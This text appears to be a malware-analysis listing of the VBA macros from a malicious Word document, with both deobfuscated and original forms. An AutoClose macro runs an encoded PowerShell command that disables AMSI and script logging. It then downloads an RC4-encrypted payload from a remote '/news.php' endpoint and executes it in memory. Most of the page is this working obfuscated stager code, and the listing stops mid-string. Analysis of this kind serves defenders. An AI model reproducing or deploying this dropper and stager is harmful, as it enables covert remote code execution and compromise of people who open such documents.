        VHd = VHd + "UAbgB0AC4AQQB1AHQAbwBtACcALAAnAFMAJwAsACcAcwB0AGUA"
        VHd = VHd + "bQAuACcALAAnAGEAJwAsACcAZABlAHIAJwAsACcAdAB3ACcAKQ"
        VHd = VHd + "ApAC4AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACcARwBl"
        VHd = VHd + "AHQARgBpAGUAJwAsACcAZAAnACwAJwBsACcAKQAuAEkAbgB2AG"
        VHd = VHd + "8AawBlACgAKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIA"
        VHd = VHd + "IAAtAGYAIAAnAHYAJwAsACcAcgAnACwAJwBlAHQAdwBQAHIAbw"
        VHd = VHd + "AnACwAJwBpAGQAZQAnACkALAAoACIAewAzAH0AewAwAH0AewAx"
        VHd = VHd + "AH0AewAyAH0AIgAgAC0AZgAnAG8AbgBQAHUAJwAsACcAYgBsAG"
        VHd = VHd + "kAYwAsAFMAdABhACcALAAnAHQAaQBjACcALAAnAE4AJwApACkA"
        VHd = VHd + "LgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAGUAJw"
        VHd = VHd + "AsACcARwAnACwAJwB0AFYAYQBsAHUAZQAnACkALgBJAG4AdgBv"
        VHd = VHd + "AGsAZQAoACQAewBuAHUAYABMAEwAfQApACwAMAApADsAfQA7AC"
        VHd = VHd + "AAKAAgACAAJgAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0A"
        VHd = VHd + "ZgAnAFYAJwAsACcAYQBSAEkAQQBiACcALAAnAGwAZQAnACkAIA"
        VHd = VHd + "AgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnADAAVQAnACwAJwB3"
        VHd = VHd + "AEkAJwApACAAIAAtAHYAQQBMAHUARQBvACkAOgA6ACIAZQBgAH"
        VHd = VHd + "gAcABlAEMAVAAxADAAMABDAE8ATgB0AGkAYABOAHUARQAiAD0A"
        VHd = VHd + "MAA7ACQAewBXAEMAfQA9ACYAKAAiAHsAMAB9AHsAMgB9AHsAMQ"
        VHd = VHd + "B9ACIALQBmACAAJwBOACcALAAnAGoAZQBjAHQAJwAsACcAZQB3"
        VHd = VHd + "AC0ATwBiACcAKQAgACgAIgB7ADQAfQB7ADMAfQB7ADUAfQB7AD"
        VHd = VHd + "IAfQB7ADEAfQB7ADYAfQB7ADAAfQAiAC0AZgAnAGwAaQBlAG4A"
        VHd = VHd + "dAAnACwAJwAuACcALAAnAHQAJwAsACcAbQAuAE4AJwAsACcAUw"
        VHd = VHd + "B5AHMAdABlACcALAAnAGUAJwAsACcAVwBlAGIAQwAnACkAOwAk"
        VHd = VHd + "AHsAdQB9AD0AKAAiAHsAMwB9AHsAMQAyAH0AewA5AH0AewAxAH"
        VHd = VHd + "0AewAxADEAfQB7ADcAfQB7ADEAMAB9AHsANgB9AHsAMgB9AHsA"
        VHd = VHd + "OAB9AHsANAB9AHsAMQA0AH0AewAwAH0AewAxADMAfQB7ADUAfQ"
        VHd = VHd + "AiACAALQBmACAAJwAwADsAJwAsACcAKABXAGkAbgBkAG8AdwAn"
        VHd = VHd + "ACwAJwA7ACAAJwAsACcATQBvAHoAaQAnACwAJwBuAHQALwAnAC"
        VHd = VHd + "wAJwByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMA"
        VHd = VHd + "awBvACcALAAnADYANAAnACwAJwAuADEAOwAgAFcATwAnACwAJw"
        VHd = VHd + "BUAHIAaQBkAGUAJwAsACcANQAuADAAIAAnACwAJwBXACcALAAn"
        VHd = VHd + "AHMAIABOAFQAIAA2ACcALAAnAGwAbABhAC8AJwAsACcAIAAnAC"
        VHd = VHd + "wAJwA3AC4AJwApADsAJAB7AHMAYABFAFIAfQA9ACQAKAAgACAA"
        VHd = VHd + "JAB7AHMAYAA3AHoAYAA4ADUAfQA6ADoAIgB1AE4ASQBjAG8AYA"
        VHd = VHd + "BkAEUAIgAuACIARwBgAEUAVABgAHMAdAByAEkAbgBHACIAKAAg"
        VHd = VHd + "ACgAIAAuACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmAC"
        VHd = VHd + "AAJwBnAGUAVAAtACcALAAnAGQASQBUAEUAbQAnACwAJwBDAGgA"
        VHd = VHd + "aQBsACcAKQAgACgAJwBWAEEAcgBpAGEAJwArACcAQgBsAEUAOg"
        VHd = VHd + "A4AHAAJwArACcANgAnACsAJwBzACcAKwAnAHcAdAAnACkAKQAu"
        VHd = VHd + "AHYAYQBsAFUARQA6ADoAKAAiAHsAMwB9AHsAMQB9AHsAMgB9AH"
        VHd = VHd + "sAMAB9ACIALQBmACcAaQBuAGcAJwAsACcAbwBtAEIAJwAsACcA"
        VHd = VHd + "YQBzAGUANgA0AFMAdAByACcALAAnAEYAcgAnACkALgBJAG4Adg"
        VHd = VHd + "BvAGsAZQAoACgAIgB7ADEAfQB7ADEAMAB9AHsAMQAyAH0AewAz"
        VHd = VHd + "AH0AewAyAH0AewAwAH0AewA4AH0AewA2AH0AewA1AH0AewAxAD"
        VHd = VHd + "EAfQB7ADQAfQB7ADcAfQB7ADkAfQAiACAALQBmACcAQQBOAGcA"
        VHd = VHd + "QQA0AEEAQwA0AEEATQBRAEEAdQBBAEQAJwAsACcAYQBBACcALA"
        VHd = VHd + "AnAEEATQBnAEEAdQBBAEQARQAnACwAJwA2AEEAQwA4AEEATAB3"
        VHd = VHd + "AEEAeABBAEQAawAnACwAJwBNAEEAQQAnACwAJwBnAEEANgBBAE"
        VHd = VHd + "QAJwAsACcATQAnACwAJwA0AEEARABBACcALAAnAEkAQQAnACwA"
        VHd = VHd + "JwBBACcALAAnAEIAMABBAEgAUQAnACwAJwBnAEEAJwAsACcAQQ"
        VHd = VHd + "BjAEEAQQAnACkAKQApACkAOwAkAHsAdAB9AD0AKAAiAHsAMAB9"
        VHd = VHd + "AHsAMgB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwAvAGEAJwAsAC"
        VHd = VHd + "cAbgAvAGcAZQB0AC4AJwAsACcAZABtAGkAJwAsACcAcABoAHAA"
        VHd = VHd + "JwApADsAJAB7AFcAQwB9AC4AIgBoAEUAYABBAGAAZABFAHIAcw"
        VHd = VHd + "AiAC4AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAEEAZAAn"
        VHd = VHd + "ACwAJwBkACcAKQAuAEkAbgB2AG8AawBlACgAKAAiAHsAMAB9AH"
        VHd = VHd + "sAMgB9AHsAMQB9ACIAIAAtAGYAJwBVAHMAZQByACcALAAnAG4A"
        VHd = VHd + "dAAnACwAJwAtAEEAZwBlACcAKQAsACQAewBVAH0AKQA7ACQAew"
        VHd = VHd + "B3AGMAfQAuACIAcABgAFIATwBYAFkAIgA9ACAAKAAgACAALgAo"
        VHd = VHd + "ACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAgACcAZwBFAF"
        VHd = VHd + "QALQBpACcALAAnAE0AJwAsACcAdABFACcAKQAgACgAIgB7ADIA"
        VHd = VHd + "fQB7ADAAfQB7ADEAfQB7ADMAfQAiAC0AZgAgACcAaQBhACcALA"
        VHd = VHd + "AnAGIATABlADoAZQBuACcALAAnAFYAYQByACcALAAnAGYASwAn"
        VHd = VHd + "ACkAIAApAC4AdgBBAEwAdQBlADoAOgAiAEQARQBgAEYAQQB1AE"
        VHd = VHd + "wAYABUAHcAYABlAEIAUAByAG8AeABZACIAOwAkAHsAdwBgAGMA"
        VHd = VHd + "fQAuACIAcAByAGAATwBYAFkAIgAuACIAYwBgAFIAZQBEAEUATg"
        VHd = VHd + "BUAGAASQBgAEEAbABTACIAIAA9ACAAIAAkAHsAYQBSAGAASwBg"
        VHd = VHd + "AGQAWgBNAH0AOgA6ACIARABgAEUAYABGAGEAVQBsAHQATgBlAF"
        VHd = VHd + "QAVwBgAE8AUgBLAGAAYwByAGUARABlAG4AdABJAGEAYABsAFMA"
        VHd = VHd + "IgA7ACQAewBzAEMAUgBpAFAAYABUAGAAOgBgAHAAUgBvAFgAWQ"
        VHd = VHd + "B9ACAAPQAgACQAewB3AGAAYwB9AC4AIgBQAGAAUgBPAFgAWQAi"
        VHd = VHd + "ADsAJAB7AGsAfQA9ACAAJAB7ADUAcQBgAG8AMgB9ADoAOgAiAG"
        VHd = VHd + "EAUwBgAGMASQBpACIALgAiAEcAZQBUAGIAWQBgAFQAYABFAFMA"
        VHd = VHd + "IgAoACgAIgB7ADEAfQB7ADYAfQB7ADUAfQB7ADQAfQB7ADMAfQ"
        VHd = VHd + "B7ADIAfQB7ADAAfQAiACAALQBmACAAJwBdACwAJwAsACcASQBy"
        VHd = VHd + "ACcALAAnAGQARABbAE0AfgBOACcALAAnADcAIQA9ACcALAAnAG"
        VHd = VHd + "8AbABHAEIAOAAnACwAJwAwAFYAQwBKAFgARgBXAHUAWQBLADEA"
        VHd = VHd + "RQAnACwAJwBBACUAJwApACkAOwAkAHsAUgB9AD0AewAkAHsAZA"
        VHd = VHd + "B9ACwAJAB7AGsAfQA9ACQAewBBAFIAYABnAHMAfQA7ACQAewBz"
        VHd = VHd + "AH0APQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwALgAoAC"
        VHd = VHd + "cAJQAnACkAewAkAHsASgB9AD0AKAAkAHsAagB9ACsAJAB7AHMA"
        VHd = VHd + "fQBbACQAewBfAH0AXQArACQAewBLAH0AWwAkAHsAXwB9ACUAJA"
        VHd = VHd + "B7AGsAfQAuACIAYwBvAGAAVQBOAFQAIgBdACkAJQAyADUANgA7"
        VHd = VHd + "ACQAewBTAH0AWwAkAHsAXwB9AF0ALAAkAHsAUwB9AFsAJAB7AG"
        VHd = VHd + "oAfQBdAD0AJAB7AHMAfQBbACQAewBKAH0AXQAsACQAewBzAH0A"
        VHd = VHd + "WwAkAHsAXwB9AF0AfQA7ACQAewBEAH0AfAAuACgAJwAlACcAKQ"
        VHd = VHd + "B7ACQAewBJAH0APQAoACQAewBpAH0AKwAxACkAJQAyADUANgA7"
        VHd = VHd + "ACQAewBIAH0APQAoACQAewBoAH0AKwAkAHsAcwB9AFsAJAB7AG"
        VHd = VHd + "kAfQBdACkAJQAyADUANgA7ACQAewBTAH0AWwAkAHsAaQB9AF0A"
        VHd = VHd + "LAAkAHsAUwB9AFsAJAB7AEgAfQBdAD0AJAB7AFMAfQBbACQAew"
        VHd = VHd + "BoAH0AXQAsACQAewBzAH0AWwAkAHsASQB9AF0AOwAkAHsAXwB9"
        VHd = VHd + "AC0AYgB4AG8AcgAkAHsAUwB9AFsAKAAkAHsAcwB9AFsAJAB7AG"
        VHd = VHd + "kAfQBdACsAJAB7AHMAfQBbACQAewBoAH0AXQApACUAMgA1ADYA"
        VHd = VHd + "XQB9AH0AOwAkAHsAVwBgAEMAfQAuACIAaABFAGAAQQBkAGUAcg"
        VHd = VHd + "BTACIALgAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBkAGQAJwAs"
        VHd = VHd + "ACcAQQAnACkALgBJAG4AdgBvAGsAZQAoACgAIgB7ADEAfQB7AD"
        VHd = VHd + "AAfQAiACAALQBmACcAbwBvAGsAaQBlACcALAAnAEMAJwApACwA"
        VHd = VHd + "KAAiAHsANgB9AHsAOAB9AHsAMgB9AHsANQB9AHsANAB9AHsAOQ"
        VHd = VHd + "B9AHsAMQB9AHsANwB9AHsAMAB9AHsAMwB9ACIALQBmACcAcAAn"
        VHd = VHd + "ACwAJwBXAC8AJwAsACcAaAB4ACcALAAnAEQATQBPAC8AZwBrAH"
        VHd = VHd + "kASABNAD0AJwAsACcAcQAnACwAJwArAG4ASgAwAG0AWABSAE8A"
        VHd = VHd + "JwAsACcAQQB5AFIAQwBvAGoAcAAnACwAJwBlAGoAJwAsACcAcw"
        VHd = VHd + "BoAG8AVwBrAHUAeQA9ACcALAAnAGIAUgAnACkAKQA7ACQAewBk"
        VHd = VHd + "AGAAQQBUAGEAfQA9ACQAewBXAGAAYwB9AC4AKAAiAHsAMQB9AH"
        VHd = VHd + "sAMgB9AHsAMwB9AHsAMAB9ACIALQBmACcAdABhACcALAAnAEQA"
        VHd = VHd + "bwB3AG4AbAAnACwAJwBvAGEAJwAsACcAZABEAGEAJwApAC4ASQ"
        VHd = VHd + "BuAHYAbwBrAGUAKAAkAHsAcwBgAEUAUgB9ACsAJAB7AHQAfQAp"
        VHd = VHd + "ADsAJAB7AEkAYABWAH0APQAkAHsARABhAGAAVABhAH0AWwAwAC"
        VHd = VHd + "4ALgAzAF0AOwAkAHsAZABBAGAAVABhAH0APQAkAHsARABBAGAA"
        VHd = VHd + "VABhAH0AWwA0AC4ALgAkAHsARABhAGAAVABBAH0ALgAiAEwARQ"
        VHd = VHd + "BgAE4AZwBUAGgAIgBdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBb"
        VHd = VHd + "AF0AXQAoACYAIAAkAHsAUgB9ACAAJAB7AEQAYABBAFQAYQB9AC"
        VHd = VHd + "AAKAAkAHsAaQBgAFYAfQArACQAewBLAH0AKQApAHwAJgAoACIA"
        VHd = VHd + "ewAwAH0AewAxAH0AIgAgAC0AZgAnAEkAJwAsACcARQBYACcAKQ"
        VHd = VHd + "A="
        Set asd = CreateObject("WScript.Shell")
        asd.Run (VHd)
End Function
Macro #2: ThisDocument
»
Deobfuscated Code 
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub AutoClose()
    SWl
End Sub

Function SWl() As 
    Set asd = CreateObject("WScript.Shell")
    asd.Run "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAQQB5AFIAQwBvAGoAcABzAGgAbwBXAGsAdQB5AD0ASwA2ADUAYgBYAEMARgBGAHMAKwBHAGgANwBXAHcAYwBmAGYAcQBDAGsAbwBQAE0AcAAxAGMAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA=="
End Function

Original Code 
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
        SWl
End Sub

Public Function SWl() As Variant
        Dim Imop As String
        Imop = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
        Imop = Imop + "BlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBp"
        Imop = Imop + "AG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAG"
        Imop = Imop + "UAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcA"
        Imop = Imop + "ZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQ"
        Imop = Imop + "BnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBB"
        Imop = Imop + "AG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAH"
        Imop = Imop + "QARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkA"
        Imop = Imop + "bABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQ"
        Imop = Imop + "B0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBs"
        Imop = Imop + "AGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAG"
        Imop = Imop + "kAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcA"
        Imop = Imop + "LgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdA"
        Imop = Imop + "BGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAn"
        Imop = Imop + "AE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlAC"
        Imop = Imop + "cAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEA"
        Imop = Imop + "cwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQ"
        Imop = Imop + "BzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0"
        Imop = Imop + "AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAE"
        Imop = Imop + "UAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUA"
        Imop = Imop + "dABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcg"
        Imop = Imop + "AnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBj"
        Imop = Imop + "ACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApAC"
        Imop = Imop + "wAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMA"
        Imop = Imop + "ZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQ"
        Imop = Imop + "A6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBl"
        Imop = Imop + "AD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAF"
        Imop = Imop + "MAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4A"
        Imop = Imop + "dAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKA"
        Imop = Imop + "BXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBX"
        Imop = Imop + "ADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAH"
        Imop = Imop + "YAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcA"
        Imop = Imop + "OwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZA"
        Imop = Imop + "BpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0"
        Imop = Imop + "AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG"
        Imop = Imop + "8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIA"
        Imop = Imop + "MABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARA"
        Imop = Imop + "BrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBN"
        Imop = Imop + "AFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBAD"
        Imop = Imop + "QAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMA"
        Imop = Imop + "LgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQ"
        Imop = Imop + "BkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQAp"
        Imop = Imop + "ADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC"
        Imop = Imop + "4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQA"
        Imop = Imop + "ZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALg"
        Imop = Imop + "BQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9"
        Imop = Imop + "ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG"
        Imop = Imop + "4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwA"
        Imop = Imop + "dABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcw"
        Imop = Imop + "A7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3"
        Imop = Imop + "AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC"
        Imop = Imop + "4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMA"
        Imop = Imop + "QwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMA"
        Imop = Imop + "BWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9"
        Imop = Imop + "AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsAC"
        Imop = Imop + "QASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsA"
        Imop = Imop + "MAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWw"
        Imop = Imop + "AkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABd"
        Imop = Imop + "ACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF"
        Imop = Imop + "0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQA"
        Imop = Imop + "fAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASA"
        Imop = Imop + "A9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABT"
        Imop = Imop + "AFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdAC"
        Imop = Imop + "wAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgA"
        Imop = Imop + "JABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQ"
        Imop = Imop + "B9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAo"
        Imop = Imop + "ACIAQwBvAG8AawBpAGUAIgAsACIAQQB5AFIAQwBvAGoAcABzAG"
        Imop = Imop + "gAbwBXAGsAdQB5AD0ASwA2ADUAYgBYAEMARgBGAHMAKwBHAGgA"
        Imop = Imop + "NwBXAHcAYwBmAGYAcQBDAGsAbwBQAE0AcAAxAGMAPQAiACkAOw"
        Imop = Imop + "AkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABE"
        Imop = Imop + "AGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAG"
        Imop = Imop + "QAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQA"
        Imop = Imop + "YQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaA"
        Imop = Imop + "BdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAk"
